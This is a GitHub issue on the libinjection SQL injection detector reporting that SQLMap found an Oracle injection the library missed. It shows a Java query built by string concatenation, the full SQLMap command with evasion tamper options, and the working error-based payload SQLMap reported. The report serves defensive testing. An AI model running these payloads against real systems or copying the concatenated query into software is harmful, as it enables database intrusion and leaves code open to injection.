client9 / libinjection

SQL / SQLI tokenizer parser analyzer

SQLMap testing with Oracle failing #123

Closed devsujit12 closed 7 years ago

devsujit12 commented 7 years ago

Testing with SQLMap revealed vulnerability with Oracle.

Initially we tested with the old external Java port (https://github.com/jeonglee/Libinjection) against Oracle and the report came out clean. No vulnerabilities detected.

However when tested with the latest main code base v3.9.1 (https://github.com/client9/libinjection) using JNI, SQLMap identified an injection point and stopped.

Please let me know if I am missing anything here. Would be happy to provide additional details and test code. We are simply using the parameter to make a back-end Oracle JDBC query:

```java
"Select * from EMPLOYEES where UPPER(NAME) like '%" + employeeName.toUpperCase() + "%'"
```


SQLMap command used for testing:

```
dev@winpc /cygdrive/c/Users/dev/sql-map/sqlmap-1.1.3 $ python "C:\Users\dev\sql-map\sqlmap-1.1.3\sqlmap.py" --url="http://localhost:8080/was-test-1.2-SNAPSHOT/employee?name=David" --timeout=10 --retries=1 --keep-alive --threads=3 --batch --level=5 --risk=3 --flush-session -p name --keep-alive --tamper="between,randomcase,space2comment" --dbms oracle
```

Error reported by Sqlmap:

```
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1356 HTTP(s) requests:
---
Parameter: name (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
    Payload: name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo
---
```